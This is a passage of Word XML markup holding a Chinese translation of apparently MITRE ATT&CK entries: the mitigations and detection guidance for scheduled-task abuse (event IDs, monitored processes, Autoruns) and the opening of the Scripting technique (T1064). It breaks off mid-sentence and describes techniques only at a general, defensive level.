                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：计算机配置</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>策略</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&gt; Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>设置</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>安全设置</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>本地策略</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户权限分配：增加调度优先级。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="2D03B726" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32EE5D2C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D792EC2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制用户账号权限并调整权限升级向量，以便只有授权的管理员才能在远程系统上创建计划任务。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0295EB39" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C6DA8F2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F73172" w14:textId="5A4D2AC5" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过命令行调用来监控常用实用程序的计划任务创建。可以在安装新软件期间或通过系统管理功能创建合法的计划任务。监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows 10</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>svchost.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和旧版</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务计划程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>taskeng.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的进程执行情况。如果计划任务不用于持久性，则攻击者很可能在操作完成时删除该任务。监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>%systemroot%\System32\Tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>务计划程序仓库来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与已知软件、补丁周期等不相关的计划任务的更改条目。不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分，例如为</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而建立网络连接，通过发现了解环境的详细信息，以及横向移动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1730B19E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过在事件日志服务中启用“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Microsoft-Windows-TaskScheduler / Operational</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”设置的方式</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为计划任务的创建和更改配置事件日志功能。然后会在计划任务活动中记录如下事件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421AADA6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>106  -</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计划任务已注册</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14849C70" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">140  - </w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计划任务已更新</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E723414" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>141  -</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计划任务已删除</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E44B05E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sysinternals Autoruns</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等工具来检测是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>旨在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>获得持久性的系统更改，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括列出当前的计划任务。查找与已知软件、补丁周期等不相关的任务更改。当与历史数据进行比较时，通过计划任务执行的可疑程序可能会显示为以前从未见过的异常进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2EDC77" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控可用于创建任务的进程和命令行参数。带内置功能的远程访问工具可以直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互，在典型的系统实用程序之外执行这些功能。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Power</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）也可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建任务，因此可能还需要配置日志功能来收集适当的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCCA4A9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>脚本编程</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="04F4E52A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31D5C2BC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1064</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="709C69E1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>逃逸，执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B96D6CC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24BB25E7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AA9E7EF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，文件监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23338D93" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>白名单，数据执行</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防护，漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>利用防护</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BCAFA66" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42082206" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="4D0E08A3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会使用脚本来帮助操作并执行多个操作。不使用脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的话，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>需手动执行。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本编程对于加快操作任务和减少关键资源访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>时间</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非常有用。有些脚本编程语言可通过在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>级别直接与操作系统交互而不是调用其他程序来绕过进程监控机制。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统常采用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>VBS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cript</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ower</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本编程语言，但也可采用命令行批处理脚本的形式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6E217E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本可以作为宏嵌入到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档中，这些宏可以设置为在鱼叉式钓鱼</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>附件及其他类型鱼叉式钓鱼</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件打开时执行。恶意嵌入宏和通过客户端执行利用进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>软件利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是两种</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>攻击方式。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>后者方式</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实施</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>攻击时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者依赖于允许的宏或用户将接受并</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>激活</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的宏。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5207B52A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在许多流行的攻击框架。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>这些框架</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不管是对安全测试人员还是攻击者都使用脚本编程形式。例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
